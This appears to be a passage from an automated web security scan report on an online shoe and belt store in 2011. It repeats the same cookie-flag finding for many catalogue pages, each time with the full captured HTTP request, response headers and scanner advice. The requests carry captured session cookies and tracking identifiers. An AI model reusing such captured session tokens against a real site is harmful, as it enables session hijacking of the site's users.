GET /columbia-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:04 GMT Server: Apache Set-Cookie: JSESSIONID=A936B13B105956F39C66063C8BCF96E7; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /crocodile-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:57 GMT Server: Apache Set-Cookie: JSESSIONID=9ACE2AEA53589B970062B2E2EFA35A6D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /crystal-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:17 GMT Server: Apache Set-Cookie: JSESSIONID=42B98DE156FFED94699667347D222388; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /denim-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:18 GMT Server: Apache Set-Cookie: JSESSIONID=26D239407E240B5019A1CB061C1D2859; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /designer-accessories-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:38 GMT Server: Apache Set-Cookie: JSESSIONID=C720812E70D8D4457122868F8227B584; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /designer-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:41 GMT Server: Apache Set-Cookie: JSESSIONID=2E9BC658D76207F2C283BAD33B8DD2ED; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /discount-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:48 GMT Server: Apache Set-Cookie: JSESSIONID=BBEB4E3D9C6182CD0EC72250EE1DA99F; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /discount.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:17 GMT Server: Apache Set-Cookie: JSESSIONID=CC3DE4228DC97007C30A7450F7282C92; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dockers-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:08 GMT Server: Apache Set-Cookie: JSESSIONID=52294603A317624EC9DE33201AAA7F5B; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dress-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:19 GMT Server: Apache Set-Cookie: JSESSIONID=CC6CE1F3382E89DFD3F877211C1901EC; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>D ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ed-hardy-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:09 GMT Server: Apache Set-Cookie: JSESSIONID=F4184CED858D9E4172AB013CB4440662; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>E ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ed-hardy-eh1206/301131 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=A737041956F9B36DC87449DB7BE75FBC; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ed-hardy-eh1206/301131/643692 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:27 GMT Server: Apache Set-Cookie: JSESSIONID=DF926E64BBA85BFE414370CC46BB7EB3; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ed-hardy-eh1206/301131/643693 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=E0E07D9662CAE55BEF428615CE83F4C8; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ed-hardy-eh1206/301131/643694 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=DC7C92F514464D35493543D312D2487F; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eyewear.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:06 GMT Server: Apache Set-Cookie: JSESSIONID=B56B7BD2606A808EC1DD2EF04ADA0B10; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>E ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fashion-accessories-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:50 GMT Server: Apache Set-Cookie: JSESSIONID=8359500A6F9F314FC6F88B19EC4E9AA8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>F ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /flats.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:14 GMT Server: Apache Set-Cookie: JSESSIONID=FF51A0D0FCDC2D53AF0F3325D9D30FD5; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>F ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /florsheim-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:12 GMT Server: Apache Set-Cookie: JSESSIONID=CBAC75A617363E13564B4ABD17322C95; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
